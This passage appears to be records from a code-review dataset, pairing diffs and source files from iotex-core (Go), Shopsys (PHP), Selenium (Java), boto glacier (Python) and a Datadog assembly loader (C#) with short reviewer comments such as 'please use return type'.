(*iotextypes.AccountMeta, *iotextypes.BlockIdentifier, error) { var ( balance string out *iotexapi.ReadStateResponse err error ) switch addr { case address.RewardingPoolAddr: if out, err = core.ReadState("rewarding", "", []byte("TotalBalance"), nil); err != nil { return nil, nil, err } val, ok := big.NewInt(0).SetString(string(out.GetData()), 10) if !ok { return nil, nil, errors.New("balance convert error") } balance = val.String() case address.StakingBucketPoolAddr: methodName, err := proto.Marshal(&iotexapi.ReadStakingDataMethod{ Method: iotexapi.ReadStakingDataMethod_TOTAL_STAKING_AMOUNT, }) if err != nil { return nil, nil, err } arg, err := proto.Marshal(&iotexapi.ReadStakingDataRequest{ Request: &iotexapi.ReadStakingDataRequest_TotalStakingAmount_{ TotalStakingAmount: &iotexapi.ReadStakingDataRequest_TotalStakingAmount{}, }, }) if err != nil { return nil, nil, err } if out, err = core.ReadState("staking", "", methodName, [][]byte{arg}); err != nil { return nil, nil, err } acc := iotextypes.AccountMeta{} if err := proto.Unmarshal(out.GetData(), &acc); err != nil { return nil, nil, errors.Wrap(err, "failed to unmarshal account meta") } balance = acc.GetBalance() default: return nil, nil, errors.Errorf("invalid address %s", addr) } return &iotextypes.AccountMeta{ Address: addr, Balance: balance, }, out.GetBlockIdentifier(), nil } // ActPoolActions returns the all Transaction Identifiers in the mempool func (core *coreService) ActPoolActions(actHashes []string) ([]*iotextypes.Action, error) { var ret []*iotextypes.Action if len(actHashes) == 0 { for _, sealeds := range core.ap.PendingActionMap() { for _, sealed := range sealeds { ret = append(ret, sealed.Proto()) } } return ret, nil } for _, hashStr := range actHashes { hs, err := hash.HexStringToHash256(hashStr) if err != nil { return nil, status.Error(codes.InvalidArgument, 
errors.Wrap(err, "failed to hex string to hash256").Error()) } sealed, err := core.ap.GetActionByHash(hs) if err != nil { return nil, status.Error(codes.NotFound, err.Error()) } ret = append(ret, sealed.Proto()) } return ret, nil } // EVMNetworkID returns the network id of evm func (core *coreService) EVMNetworkID() uint32 { return config.EVMNetworkID() } // ChainID returns the chain id of evm func (core *coreService) ChainID() uint32 { return core.bc.ChainID() } // GetActionByActionHash returns action by action hash func (core *coreService) ActionByActionHash(h hash.Hash256) (action.SealedEnvelope, error) { if !core.hasActionIndex || core.indexer == nil { return action.SealedEnvelope{}, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } selp, _, _, _, err := core.getActionByActionHash(h) return selp, err } // ReadContractStorage reads contract's storage func (core *coreService) ReadContractStorage(ctx context.Context, addr address.Address, key []byte) ([]byte, error) { ctx, err := core.bc.Context(ctx) if err != nil { return nil, status.Error(codes.Internal, err.Error()) } return core.sf.ReadContractStorage(ctx, addr, key) }
1
24,415
let's keep ActionByActionHash and delete getActionByActionHash
iotexproject-iotex-core
go
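A minimal sketch, not taken from the iotex-core repository, of how the review comment above could be applied: keep the exported ActionByActionHash and fold the lookups from the unexported getActionByActionHash into it, so the helper can be deleted. Every call used here (core.indexer.GetActionIndex, core.dao.GetBlockByHeight, core.dao.GetActionByActionHash) already appears in the file above, but the widened return signature is an assumption and the actual resolution in the project may differ.

// Sketch only: exported ActionByActionHash absorbs the body of the unexported
// getActionByActionHash so the helper can be removed. The extra return values
// (block hash, height, index) are assumed for the internal callers' benefit.
func (core *coreService) ActionByActionHash(h hash.Hash256) (action.SealedEnvelope, hash.Hash256, uint64, uint32, error) {
	if !core.hasActionIndex || core.indexer == nil {
		return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error())
	}
	actIndex, err := core.indexer.GetActionIndex(h[:])
	if err != nil {
		return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, err
	}
	blk, err := core.dao.GetBlockByHeight(actIndex.BlockHeight())
	if err != nil {
		return action.SealedEnvelope{}, hash.ZeroHash256, 0, 0, err
	}
	selp, index, err := core.dao.GetActionByActionHash(h, actIndex.BlockHeight())
	return selp, blk.HashBlock(), actIndex.BlockHeight(), index, err
}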
@@ -64,4 +64,12 @@ class ProductVisibility { return $this->visible; } + + /** + * @return \Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup + */ + public function getPricingGroup(): PricingGroup + { + return $this->pricingGroup; + } }
1
<?php

namespace Shopsys\FrameworkBundle\Model\Product;

use Doctrine\ORM\Mapping as ORM;
use Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup;

/**
 * @ORM\Table(name="product_visibilities")
 * @ORM\Entity
 */
class ProductVisibility
{
    /**
     * @var \Shopsys\FrameworkBundle\Model\Product\Product
     *
     * @ORM\Id
     * @ORM\ManyToOne(targetEntity="Shopsys\FrameworkBundle\Model\Product\Product")
     * @ORM\JoinColumn(nullable=false, name="product_id", referencedColumnName="id", onDelete="CASCADE")
     */
    protected $product;

    /**
     * @var \Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup
     *
     * @ORM\Id
     * @ORM\ManyToOne(targetEntity="Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup")
     * @ORM\JoinColumn(nullable=false, name="pricing_group_id", referencedColumnName="id", onDelete="CASCADE")
     */
    protected $pricingGroup;

    /**
     * @var int
     *
     * @ORM\Id
     * @ORM\Column(type="integer")
     */
    protected $domainId;

    /**
     * @var bool
     *
     * @ORM\Column(type="boolean")
     */
    protected $visible;

    /**
     * @param \Shopsys\FrameworkBundle\Model\Product\Product $product
     * @param \Shopsys\FrameworkBundle\Model\Pricing\Group\PricingGroup $pricingGroup
     * @param int $domainId
     */
    public function __construct(
        Product $product,
        PricingGroup $pricingGroup,
        $domainId
    ) {
        $this->product = $product;
        $this->pricingGroup = $pricingGroup;
        $this->domainId = $domainId;
        $this->visible = false;
    }

    public function isVisible()
    {
        return $this->visible;
    }
}
1
16,921
please use return type
shopsys-shopsys
php
@@ -76,7 +76,7 @@ public class TestEdgeDriver extends RemoteWebDriver implements WebStorage, Locat .findFirst().orElseThrow(WebDriverException::new); service = (EdgeDriverService) builder.withVerbose(true).withLogFile(logFile.toFile()).build(); - LOG.info("edgedriver will log to " + logFile); + LOG.fine("edgedriver will log to " + logFile); service.start(); Runtime.getRuntime().addShutdownHook(new Thread(() -> service.stop())); }
1
// Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements.  See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership.  The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License.  You may obtain a copy of the License at
//
//   http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied.  See the License for the
// specific language governing permissions and limitations
// under the License.

package org.openqa.selenium.testing.drivers;

import org.openqa.selenium.Capabilities;
import org.openqa.selenium.OutputType;
import org.openqa.selenium.WebDriverException;
import org.openqa.selenium.edge.EdgeDriverService;
import org.openqa.selenium.edge.EdgeOptions;
import org.openqa.selenium.html5.LocalStorage;
import org.openqa.selenium.html5.Location;
import org.openqa.selenium.html5.LocationContext;
import org.openqa.selenium.html5.SessionStorage;
import org.openqa.selenium.html5.WebStorage;
import org.openqa.selenium.remote.DriverCommand;
import org.openqa.selenium.remote.RemoteWebDriver;
import org.openqa.selenium.remote.html5.RemoteLocationContext;
import org.openqa.selenium.remote.html5.RemoteWebStorage;
import org.openqa.selenium.remote.service.DriverService;

import java.io.File;
import java.io.IOException;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.HashMap;
import java.util.Map;
import java.util.ServiceLoader;
import java.util.logging.Logger;
import java.util.stream.StreamSupport;

/**
 * Customized RemoteWebDriver that will communicate with a service that lives and dies with the
 * entire test suite. We do not use {@link org.openqa.selenium.edge.EdgeDriver} since that starts and stops the service
 * with each instance (and that is too expensive for our purposes).
 */
public class TestEdgeDriver extends RemoteWebDriver implements WebStorage, LocationContext {

  private final static Logger LOG = Logger.getLogger(TestEdgeDriver.class.getName());

  private static EdgeDriverService service;
  private RemoteWebStorage webStorage;
  private RemoteLocationContext locationContext;

  public TestEdgeDriver(Capabilities capabilities) {
    super(getServiceUrl(), edgeWithCustomCapabilities(capabilities));
    webStorage = new RemoteWebStorage(getExecuteMethod());
    locationContext = new RemoteLocationContext(getExecuteMethod());
  }

  private static URL getServiceUrl() {
    try {
      if (service == null) {
        Path logFile = Files.createTempFile("edgedriver", ".log");
        boolean isLegacy = System.getProperty("webdriver.edge.edgehtml") == null ||
                           Boolean.getBoolean("webdriver.edge.edgehtml");

        EdgeDriverService.Builder<?, ?> builder =
          StreamSupport.stream(ServiceLoader.load(DriverService.Builder.class).spliterator(), false)
            .filter(b -> b instanceof EdgeDriverService.Builder)
            .map(b -> (EdgeDriverService.Builder<?, ?>) b)
            .filter(b -> b.isLegacy() == isLegacy)
            .findFirst().orElseThrow(WebDriverException::new);

        service = (EdgeDriverService) builder.withVerbose(true).withLogFile(logFile.toFile()).build();
        LOG.info("edgedriver will log to " + logFile);
        service.start();

        Runtime.getRuntime().addShutdownHook(new Thread(() -> service.stop()));
      }
      return service.getUrl();
    } catch (IOException e) {
      throw new RuntimeException(e);
    }
  }

  private static Capabilities edgeWithCustomCapabilities(Capabilities originalCapabilities) {
    EdgeOptions options = new EdgeOptions();

    if (System.getProperty("webdriver.edge.edgehtml") == null || Boolean.getBoolean("webdriver.edge.edgehtml"))
      return options;

    options.addArguments("disable-extensions", "disable-infobars", "disable-breakpad");
    Map<String, Object> prefs = new HashMap<>();
    prefs.put("exit_type", "None");
    prefs.put("exited_cleanly", true);
    options.setExperimentalOption("prefs", prefs);
    String edgePath = System.getProperty("webdriver.edge.binary");
    if (edgePath != null) {
      options.setBinary(new File(edgePath));
    }

    if (originalCapabilities != null) {
      options.merge(originalCapabilities);
    }

    return options;
  }

  @Override
  public <X> X getScreenshotAs(OutputType<X> target) {
    // Get the screenshot as base64.
    String base64 = (String) execute(DriverCommand.SCREENSHOT).getValue();
    // ... and convert it.
    return target.convertFromBase64Png(base64);
  }

  @Override
  public LocalStorage getLocalStorage() {
    return webStorage.getLocalStorage();
  }

  @Override
  public SessionStorage getSessionStorage() {
    return webStorage.getSessionStorage();
  }

  @Override
  public Location location() {
    return locationContext.location();
  }

  @Override
  public void setLocation(Location location) {
    locationContext.setLocation(location);
  }
}
1
17,118
This is deliberately at this level.
SeleniumHQ-selenium
java
@@ -237,7 +237,7 @@ class UploadWorkerThread(TransferThread): except self._retry_exceptions as e: log.error("Exception caught uploading part number %s for " "vault %s, attempt: (%s / %s), filename: %s, " - "exception: %s, msg: %s", + "exception: %s as msg: %s", work[0], self._vault_name, i + 1, self._num_retries + 1, self._filename, e.__class__, e) time.sleep(self._time_between_retries)
1
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # import os import math import threading import hashlib import time import logging from boto.compat import Queue import binascii from boto.glacier.utils import DEFAULT_PART_SIZE, minimum_part_size, \ chunk_hashes, tree_hash, bytes_to_hex from boto.glacier.exceptions import UploadArchiveError, \ DownloadArchiveError, \ TreeHashDoesNotMatchError _END_SENTINEL = object() log = logging.getLogger('boto.glacier.concurrent') class ConcurrentTransferer(object): def __init__(self, part_size=DEFAULT_PART_SIZE, num_threads=10): self._part_size = part_size self._num_threads = num_threads self._threads = [] def _calculate_required_part_size(self, total_size): min_part_size_required = minimum_part_size(total_size) if self._part_size >= min_part_size_required: part_size = self._part_size else: part_size = min_part_size_required log.debug("The part size specified (%s) is smaller than " "the minimum required part size. Using a part " "size of: %s", self._part_size, part_size) total_parts = int(math.ceil(total_size / float(part_size))) return total_parts, part_size def _shutdown_threads(self): log.debug("Shutting down threads.") for thread in self._threads: thread.should_continue = False for thread in self._threads: thread.join() log.debug("Threads have exited.") def _add_work_items_to_queue(self, total_parts, worker_queue, part_size): log.debug("Adding work items to queue.") for i in range(total_parts): worker_queue.put((i, part_size)) for i in range(self._num_threads): worker_queue.put(_END_SENTINEL) class ConcurrentUploader(ConcurrentTransferer): """Concurrently upload an archive to glacier. This class uses a thread pool to concurrently upload an archive to glacier using the multipart upload API. The threadpool is completely managed by this class and is transparent to the users of this class. """ def __init__(self, api, vault_name, part_size=DEFAULT_PART_SIZE, num_threads=10): """ :type api: :class:`boto.glacier.layer1.Layer1` :param api: A layer1 glacier object. :type vault_name: str :param vault_name: The name of the vault. :type part_size: int :param part_size: The size, in bytes, of the chunks to use when uploading the archive parts. The part size must be a megabyte multiplied by a power of two. :type num_threads: int :param num_threads: The number of threads to spawn for the thread pool. The number of threads will control how much parts are being concurrently uploaded. 
""" super(ConcurrentUploader, self).__init__(part_size, num_threads) self._api = api self._vault_name = vault_name def upload(self, filename, description=None): """Concurrently create an archive. The part_size value specified when the class was constructed will be used *unless* it is smaller than the minimum required part size needed for the size of the given file. In that case, the part size used will be the minimum part size required to properly upload the given file. :type file: str :param file: The filename to upload :type description: str :param description: The description of the archive. :rtype: str :return: The archive id of the newly created archive. """ total_size = os.stat(filename).st_size total_parts, part_size = self._calculate_required_part_size(total_size) hash_chunks = [None] * total_parts worker_queue = Queue() result_queue = Queue() response = self._api.initiate_multipart_upload(self._vault_name, part_size, description) upload_id = response['UploadId'] # The basic idea is to add the chunks (the offsets not the actual # contents) to a work queue, start up a thread pool, let the crank # through the items in the work queue, and then place their results # in a result queue which we use to complete the multipart upload. self._add_work_items_to_queue(total_parts, worker_queue, part_size) self._start_upload_threads(result_queue, upload_id, worker_queue, filename) try: self._wait_for_upload_threads(hash_chunks, result_queue, total_parts) except UploadArchiveError as e: log.debug("An error occurred while uploading an archive, " "aborting multipart upload.") self._api.abort_multipart_upload(self._vault_name, upload_id) raise e log.debug("Completing upload.") response = self._api.complete_multipart_upload( self._vault_name, upload_id, bytes_to_hex(tree_hash(hash_chunks)), total_size) log.debug("Upload finished.") return response['ArchiveId'] def _wait_for_upload_threads(self, hash_chunks, result_queue, total_parts): for _ in range(total_parts): result = result_queue.get() if isinstance(result, Exception): log.debug("An error was found in the result queue, terminating " "threads: %s", result) self._shutdown_threads() raise UploadArchiveError("An error occurred while uploading " "an archive: %s" % result) # Each unit of work returns the tree hash for the given part # number, which we use at the end to compute the tree hash of # the entire archive. part_number, tree_sha256 = result hash_chunks[part_number] = tree_sha256 self._shutdown_threads() def _start_upload_threads(self, result_queue, upload_id, worker_queue, filename): log.debug("Starting threads.") for _ in range(self._num_threads): thread = UploadWorkerThread(self._api, self._vault_name, filename, upload_id, worker_queue, result_queue) time.sleep(0.2) thread.start() self._threads.append(thread) class TransferThread(threading.Thread): def __init__(self, worker_queue, result_queue): super(TransferThread, self).__init__() self._worker_queue = worker_queue self._result_queue = result_queue # This value can be set externally by other objects # to indicate that the thread should be shut down. 
self.should_continue = True def run(self): while self.should_continue: try: work = self._worker_queue.get(timeout=1) except Empty: continue if work is _END_SENTINEL: self._cleanup() return result = self._process_chunk(work) self._result_queue.put(result) self._cleanup() def _process_chunk(self, work): pass def _cleanup(self): pass class UploadWorkerThread(TransferThread): def __init__(self, api, vault_name, filename, upload_id, worker_queue, result_queue, num_retries=5, time_between_retries=5, retry_exceptions=Exception): super(UploadWorkerThread, self).__init__(worker_queue, result_queue) self._api = api self._vault_name = vault_name self._filename = filename self._fileobj = open(filename, 'rb') self._upload_id = upload_id self._num_retries = num_retries self._time_between_retries = time_between_retries self._retry_exceptions = retry_exceptions def _process_chunk(self, work): result = None for i in range(self._num_retries + 1): try: result = self._upload_chunk(work) break except self._retry_exceptions as e: log.error("Exception caught uploading part number %s for " "vault %s, attempt: (%s / %s), filename: %s, " "exception: %s, msg: %s", work[0], self._vault_name, i + 1, self._num_retries + 1, self._filename, e.__class__, e) time.sleep(self._time_between_retries) result = e return result def _upload_chunk(self, work): part_number, part_size = work start_byte = part_number * part_size self._fileobj.seek(start_byte) contents = self._fileobj.read(part_size) linear_hash = hashlib.sha256(contents).hexdigest() tree_hash_bytes = tree_hash(chunk_hashes(contents)) byte_range = (start_byte, start_byte + len(contents) - 1) log.debug("Uploading chunk %s of size %s", part_number, part_size) response = self._api.upload_part(self._vault_name, self._upload_id, linear_hash, bytes_to_hex(tree_hash_bytes), byte_range, contents) # Reading the response allows the connection to be reused. response.read() return (part_number, tree_hash_bytes) def _cleanup(self): self._fileobj.close() class ConcurrentDownloader(ConcurrentTransferer): """ Concurrently download an archive from glacier. This class uses a thread pool to concurrently download an archive from glacier. The threadpool is completely managed by this class and is transparent to the users of this class. """ def __init__(self, job, part_size=DEFAULT_PART_SIZE, num_threads=10): """ :param job: A layer2 job object for archive retrieval object. :param part_size: The size, in bytes, of the chunks to use when uploading the archive parts. The part size must be a megabyte multiplied by a power of two. """ super(ConcurrentDownloader, self).__init__(part_size, num_threads) self._job = job def download(self, filename): """ Concurrently download an archive. 
:param filename: The filename to download the archive to :type filename: str """ total_size = self._job.archive_size total_parts, part_size = self._calculate_required_part_size(total_size) worker_queue = Queue() result_queue = Queue() self._add_work_items_to_queue(total_parts, worker_queue, part_size) self._start_download_threads(result_queue, worker_queue) try: self._wait_for_download_threads(filename, result_queue, total_parts) except DownloadArchiveError as e: log.debug("An error occurred while downloading an archive: %s", e) raise e log.debug("Download completed.") def _wait_for_download_threads(self, filename, result_queue, total_parts): """ Waits until the result_queue is filled with all the downloaded parts This indicates that all part downloads have completed Saves downloaded parts into filename :param filename: :param result_queue: :param total_parts: """ hash_chunks = [None] * total_parts with open(filename, "wb") as f: for _ in range(total_parts): result = result_queue.get() if isinstance(result, Exception): log.debug("An error was found in the result queue, " "terminating threads: %s", result) self._shutdown_threads() raise DownloadArchiveError( "An error occurred while uploading " "an archive: %s" % result) part_number, part_size, actual_hash, data = result hash_chunks[part_number] = actual_hash start_byte = part_number * part_size f.seek(start_byte) f.write(data) f.flush() final_hash = bytes_to_hex(tree_hash(hash_chunks)) log.debug("Verifying final tree hash of archive, expecting: %s, " "actual: %s", self._job.sha256_treehash, final_hash) if self._job.sha256_treehash != final_hash: self._shutdown_threads() raise TreeHashDoesNotMatchError( "Tree hash for entire archive does not match, " "expected: %s, got: %s" % (self._job.sha256_treehash, final_hash)) self._shutdown_threads() def _start_download_threads(self, result_queue, worker_queue): log.debug("Starting threads.") for _ in range(self._num_threads): thread = DownloadWorkerThread(self._job, worker_queue, result_queue) time.sleep(0.2) thread.start() self._threads.append(thread) class DownloadWorkerThread(TransferThread): def __init__(self, job, worker_queue, result_queue, num_retries=5, time_between_retries=5, retry_exceptions=Exception): """ Individual download thread that will download parts of the file from Glacier. Parts to download stored in work queue. Parts download to a temp dir with each part a separate file :param job: Glacier job object :param work_queue: A queue of tuples which include the part_number and part_size :param result_queue: A priority queue of tuples which include the part_number and the path to the temp file that holds that part's data. """ super(DownloadWorkerThread, self).__init__(worker_queue, result_queue) self._job = job self._num_retries = num_retries self._time_between_retries = time_between_retries self._retry_exceptions = retry_exceptions def _process_chunk(self, work): """ Attempt to download a part of the archive from Glacier Store the result in the result_queue :param work: """ result = None for _ in range(self._num_retries): try: result = self._download_chunk(work) break except self._retry_exceptions as e: log.error("Exception caught downloading part number %s for " "job %s", work[0], self._job,) time.sleep(self._time_between_retries) result = e return result def _download_chunk(self, work): """ Downloads a chunk of archive from Glacier. 
Saves the data to a temp file Returns the part number and temp file location :param work: """ part_number, part_size = work start_byte = part_number * part_size byte_range = (start_byte, start_byte + part_size - 1) log.debug("Downloading chunk %s of size %s", part_number, part_size) response = self._job.get_output(byte_range) data = response.read() actual_hash = bytes_to_hex(tree_hash(chunk_hashes(data))) if response['TreeHash'] != actual_hash: raise TreeHashDoesNotMatchError( "Tree hash for part number %s does not match, " "expected: %s, got: %s" % (part_number, response['TreeHash'], actual_hash)) return (part_number, part_size, binascii.unhexlify(actual_hash), data)
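To make the intended use of the uploader defined above concrete, here is a minimal usage sketch. It assumes boto can find AWS credentials in the usual places (environment or boto config); the vault name, file name and part size are placeholders rather than values taken from this dataset.

# Minimal usage sketch for ConcurrentUploader (vault name and file are placeholders).
from boto.glacier.layer1 import Layer1
from boto.glacier.concurrent import ConcurrentUploader

api = Layer1()  # credentials are read from the boto config / environment
uploader = ConcurrentUploader(api, 'my-vault',
                              part_size=8 * 1024 * 1024,  # 1 MB times a power of two
                              num_threads=4)
archive_id = uploader.upload('backup.tar', description='nightly backup')
print('created archive:', archive_id)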
1
11,661
I'm going to go ahead and undo this change; I don't think it was intentional.
boto-boto
py
@@ -163,7 +163,7 @@ namespace Datadog.AutoInstrumentation.ManagedLoader /// As a result, the target framework moniker and the binary compatibility flags are initialized correctly. /// </summary> /// <remarks> - /// The above logic is further specialised, depending on the kind of the currnent AppDomain and where the app is hosted: + /// The above logic is further specialized, depending on the kind of the current AppDomain and where the app is hosted: /// <br /> /// * On non-default AD: /// we do not wait.
1
using System; using System.Collections.Generic; using System.IO; using System.Reflection; using System.Threading; using Datadog.Util; namespace Datadog.AutoInstrumentation.ManagedLoader { /// <summary> /// Loads specified assemblies into the current AppDomain. /// /// This is the only public class in this assembly. /// This entire assembly is compiled into the native profiler DLL as a resource. /// This happens both, for the profiler part of the Tracer, and for the actual Profiler. /// The native code then uses this class to call arbitrary managed code: /// It uses IL rewriting to inject a call to <c>AssemblyLoader.Run(..)</c> and passes a list of assemblies. /// Then, this class loads all of the specified assemblies and calls a well known entry point in those assemblies. /// (See <c>TargetLibraryEntrypointXxx</c> constants in this class.) /// If the specified assemblies do not contain such an entry point, they will be loaded, but nothing will be executed. /// /// This class sets up a basic AppDomain.AssemblyResolve handler to look for the assemblies in a framework-specific subdirectory /// of the product home directory in addition to the normal probing paths (e.g. DD_DOTNET_TRACER_HOME for the Tracer). /// It also allows for some SxS loading using custom Assembly Load Context. /// /// If a target assembly needs additional AssemblyResolve event logic to satisfy its dependencies, /// or for any other reasons, it must set up its own AssemblyResolve handler as the first thing after its /// entry point is called. /// /// !*! Do not make the AppDomain.AssemblyResolve handler in here more complex !*! /// If anything, it should be simplified and any special logic should be moved into the respective assemblies /// requested for loading. /// /// !*! Also, remember that this assembly is shared between the Tracer's profiler component /// and the Profiler's profiler component. Do not put specialized code here !*! /// </summary> public class AssemblyLoader { /// <summary> /// The constants <c>TargetLibraryEntrypointMethod</c>, and <c>...Type</c> specify /// which entrypoint to call in the specified assemblies. The respective assembly is expected to have /// exactly this entry point. Otherwise, the assembly will be loaded, but nothing will be invoked /// explicitly (but be aware of Module cctor caveats). /// The method must be static, the return type of the method must be <c>void</c> and it must have no parameters. /// Before doing anything else, the target assemblies must set up AppDomain AssemblyResolve events that /// make sure that their respective dependencies can be loaded. /// </summary> public const string TargetLibraryEntrypointMethod = "Run"; /// <summary> The namespace and the type name of the entrypoint to invoke in each loaded assemby. /// More info: <see cref="AssemblyLoader.TargetLibraryEntrypointMethod" />. </summary> public const string TargetLibraryEntrypointType = "Datadog.AutoInstrumentation" + "." + "DllMain"; internal const bool UseConsoleLoggingInsteadOfFile = false; // Should be False in production. internal const bool UseConsoleLogInAdditionToFileLog = false; // Should be False in production? internal const bool UseConsoleLoggingIfFileLoggingFails = true; // May be True in production. Can that affect customer app behaviour? private const string LoggingComponentMoniker = nameof(AssemblyLoader); // The prefix to this is specified in LogComposer.tt private static class ExecuteDelayedConstants { public const string ThreadName = "DD.Profiler." + nameof(AssemblyLoader) + "." 
+ nameof(AssemblyLoader.ExecuteDelayed); public const int SleepDurationMs = 100; // Set this env var to FALSE to disable delayed execution: public const string IsEnabled_EnvVarName = "DD_INTERNAL_LOADER_DELAY_ENABLED"; public const bool IsEnabled_DefaultVal = true; // Set this env var to a POSITIVE NUMBER to force delayed execution in default IIS app domain: public const string IisDelayMs_EnvVarName = "DD_INTERNAL_LOADER_DELAY_IIS_MILLISEC"; public const int IisDelayMs_DefaultVal = 0; } private bool _isDefaultAppDomain; private string[] _assemblyNamesToLoadIntoDefaultAppDomain; private string[] _assemblyNamesToLoadIntoNonDefaultAppDomains; /// <summary> /// Instantiates an <c>AssemblyLoader</c> instance with the specified assemblies and executes it. /// </summary> /// <param name="assemblyNamesToLoadIntoDefaultAppDomain">List of assemblies to load and start if the curret App Domain is the default App Domain.</param> /// <param name="assemblyNamesToLoadIntoNonDefaultAppDomains">List of assemblies to load and start if the curret App Domain is the NOT default App Domain.</param> public static void Run(string[] assemblyNamesToLoadIntoDefaultAppDomain, string[] assemblyNamesToLoadIntoNonDefaultAppDomains) { try { var assemblyLoader = new AssemblyLoader(assemblyNamesToLoadIntoDefaultAppDomain, assemblyNamesToLoadIntoNonDefaultAppDomains); assemblyLoader.Execute(); } catch { // An exception escaped from the loader. We are about to return to the caller, which is likely the IL-injected code in the hook. // All we can do is log the error and swallow it to avoid crashing things. } } /// <summary> /// Initializes a new instance of the <see cref="AssemblyLoader"/> class. /// </summary> /// <param name="assemblyNamesToLoadIntoDefaultAppDomain">List of assemblies to load and start if the curret App Domain is the default App Domain.</param> /// <param name="assemblyNamesToLoadIntoNonDefaultAppDomains">List of assemblies to load and start if the curret App Domain is the NOT default App Domain.</param> public AssemblyLoader(string[] assemblyNamesToLoadIntoDefaultAppDomain, string[] assemblyNamesToLoadIntoNonDefaultAppDomains) { _assemblyNamesToLoadIntoDefaultAppDomain = assemblyNamesToLoadIntoDefaultAppDomain; _assemblyNamesToLoadIntoNonDefaultAppDomains = assemblyNamesToLoadIntoNonDefaultAppDomains; } public void Execute() { try { if (IsExecutionDelayRequired()) { Thread executeDelayedThread = new Thread(ExecuteDelayed); executeDelayedThread.Name = ExecuteDelayedConstants.ThreadName; executeDelayedThread.IsBackground = true; executeDelayedThread.Start(this); } else { InitLogAndExecute(this, isDelayed: false, waitForAppDomainReadinessElapsedMs: 0); } } catch (Exception ex) { LogToConsoleIfEnabled("An error occurred. Assemblies may be not loaded or started.", ex); } } /// <summary> /// <c>ExecuteDelayed</c> is about preventing side effects from running the loader very early in the AppDomain life cycle /// by delaying it towards a later point in the AppDomain Life cycle.<br /> /// <br /> /// Example for a crash caused by this kind of side effect: /// <br /> /// WCF applications using `BasicHttpsBinding` (note the "s" in https) were crashing with the continuous profiler attached. 
/// Error:<br /> /// _System.Configuration.ConfigurationErrorsException: Configuration binding extension 'system.serviceModel/bindings/basicHttpsBinding' /// could not be found.Verify that this binding extension is properly registered in system.serviceModel/extensions/bindingExtensions and /// that it is spelled correctly._ /// <br /> /// This was because the respective parts WCF configuration subsystem used `WebSocket.IsApplicationTargeting45()` to tweak their behavior /// on different framework versions. In turn, `WebSocket.IsApplicationTargeting45()` calls the static method /// `BinaryCompatibility.TargetsAtLeast_Desktop_V4_5()`. That method uses the static variable `s_map`. That, in turn, is initialized /// by the static cctor, i.e. first time `BinaryCompatibility` the class is used. /// <br /> /// This Assembly Loader calls `Array.Sort` while initializing its logger. /// That, it turn, also uses the `BinaryCompatibility` class internally, to choose a backward-compatible sorting algorithm. /// As a result those flags are initialized and cached when the loader is invoked. However, at that time, the AppDomain may not /// be completely initialized. To initialize, the `BinaryCompatibility` cctor invokes `AppDomain.GetTargetFrameworkName()`, which, /// in turn, calls `Assembly.GetEntryAssembly()`. /// <br /> /// That API returns `null` when invoked too early in the AppDomain lifecycle. /// As a result, a bogus target framework moniker is obtained (and cashed), and - in turn - the binary compatibility flags /// are initialized incorrectly (and also cached). As a result, everything that relies on the binary compatibility flags /// (or the target Framework moniker) may work in an unpredictable matter. This also leads to the WCF crash. /// <br /> /// To mitigate that, inside of <c>Execute()</c> we inspect whether `Assembly.GetEntryAssembly()` returns `null` before we /// start executing. If it does, we off-load the execution to a helper thread and returns immediately. /// The helper thread runs the <c>ExecuteDelayed(..)</c> method: It sleeps and periodically checks /// `Assembly.GetEntryAssembly()` until it no longer returns returns `null`. Then the Loader proceeds with its normal logic. /// <br /> /// As a result, the target framework moniker and the binary compatibility flags are initialized correctly. /// </summary> /// <remarks> /// The above logic is further specialised, depending on the kind of the currnent AppDomain and where the app is hosted: /// <br /> /// * On non-default AD: /// we do not wait. /// <br /> /// * On default AD, app NOT hosted in IIS:: /// `GetEntryAssembly` initially returns null, but once the AD is fully initialized, it returns the correct value. /// So, we apply the above strategy: wait on a separate thread until `GetEntryAssembly` is not null and then execute the loader. /// As mentioned, it is required because some APIs need `GetEntryAssembly` to populate bin compat flags in the Fx. /// * The user does not need to specify a parameter for this, since we wait _until `GetEntryAssembly` is not null_. /// * This behavior is on by default, but all delaying may be disabled using `DD_INTERNAL_LOADER_DELAY_ENABLED=false`. /// <br /> /// * On default AD, app IS hosted in IIS: /// `GetEntryAssembly` always returns null. It will always stay null, and there is no point delaying anything in that case. /// Even if we did delay, we would not have an end-condition for the wait as `GetEntryAssembly` always remains null forever. /// * So by default we do not wait on IIS. 
